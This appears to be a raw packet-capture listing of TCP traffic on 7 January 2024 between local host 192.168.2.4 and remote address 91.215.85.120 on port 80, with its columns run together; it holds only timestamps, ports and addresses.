                                                                                                                                                                    Jan 7, 2024 05:29:25.076678038 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.077205896 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.077282906 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.077363968 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.077383041 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.077446938 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.077538013 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.077549934 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.077579975 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.077605009 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.077651978 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.077745914 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.077790022 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.079304934 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.079766989 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.079860926 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.079914093 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.079952955 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.079977989 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.079978943 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.080055952 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.080099106 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.081245899 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.081980944 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.082684040 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.082779884 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.084034920 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.084093094 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.145220041 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.200412989 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.237867117 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.237936020 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.238053083 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.253062010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.253103018 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.253173113 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.254045010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.254106045 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.254159927 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.254164934 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.254226923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.254415035 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.254456997 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.254492998 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.254538059 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.254580021 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.254653931 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.256304026 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.256356955 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.256375074 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.256416082 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.256614923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.256726980 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.257402897 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.258816957 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.258944035 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.259041071 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.259085894 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.259133101 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.259176016 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.259942055 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.260071993 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.260191917 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.260236979 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.260246038 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.260284901 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.260754108 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.260802031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.260869980 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.260910034 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.260924101 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.260962963 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.260966063 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.261042118 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.261151075 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.261192083 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.261224031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.261270046 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.261295080 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.261358023 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.261446953 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.261490107 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.261665106 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.261713028 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.261738062 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.261802912 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.261934042 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.261977911 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.262049913 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.262092113 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.262116909 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.262520075 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.262586117 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.262625933 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.262939930 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.262995958 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.263003111 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.263015985 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.263101101 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.263127089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.263261080 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.263310909 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.263367891 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.263413906 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.263499022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.263557911 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.263572931 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.263612986 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.263667107 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.264134884 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.264252901 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.264297962 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.264437914 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.264483929 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.264487982 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.264575958 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.265382051 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.271361113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.278656006 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.779169083 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.779201984 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:25.973273039 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:25.990448952 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:26.091017008 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:27.857429981 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:27.857475042 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.051083088 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.071446896 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.071556091 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.071610928 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.071614027 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.071671963 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.071712017 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.071772099 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.071887970 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.071933031 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.071986914 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.072067976 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.072134018 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.072161913 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.072221994 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.072266102 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.265223980 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.265314102 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.265368938 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.265436888 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.265537024 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.265578985 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.265616894 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.265732050 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.265779972 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.265827894 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.265993118 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.266031981 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.266077995 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.266174078 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.266211033 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.266235113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.266314030 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.266352892 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.266423941 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.266500950 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.266541004 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.266616106 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.266691923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.266730070 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.266757965 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.266805887 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.266850948 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.266902924 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.266995907 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.267036915 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.461895943 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.461916924 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.461971045 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.461994886 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.462002039 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.462029934 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.462038994 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.462079048 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.462116003 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.462152958 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.462270021 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.462325096 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.462423086 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.462496996 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.462531090 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.462619066 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.462702990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.462738037 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.462801933 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.462882042 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.462915897 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.462939024 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.462996960 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.463032007 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.463139057 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.463218927 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.463253975 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.463268995 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.463372946 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.463407993 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.463454962 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.463562965 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.463599920 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.463965893 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.464015007 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.464054108 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.464082956 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.464107037 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.464145899 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.464196920 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.464262009 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.464297056 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.464342117 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.464409113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.464448929 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.464525938 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.464584112 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.464623928 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.464653015 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.464730978 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.464771032 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.464862108 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.464915037 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.464951992 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.465186119 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.465257883 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.465295076 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.465374947 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.465428114 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.465462923 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.656338930 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.656352997 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.656364918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.656375885 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.656414032 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.656435013 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.656444073 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.656472921 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.656513929 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.656575918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.656614065 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.656652927 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.656668901 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.656754017 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.656768084 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.656794071 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.656802893 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.656820059 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.656847000 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.656903982 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.656917095 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.656929016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.656949043 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.656965017 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.656969070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657006025 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657044888 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.657063961 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657121897 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657197952 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657212019 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.657228947 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657257080 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657267094 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.657301903 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657314062 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657335997 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.657360077 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657372952 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657386065 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657397985 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.657433987 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.657459021 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657521963 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657533884 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657550097 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657561064 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657567024 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.657594919 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.657634020 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657646894 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657674074 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.657691002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657713890 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657727957 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.657763958 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657776117 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657787085 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657799959 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.657825947 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657829046 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.657918930 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657936096 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657947063 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.657965899 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.657977104 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:28.658267021 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:28.658308983 CET804973591.215.85.120192.168.2.4
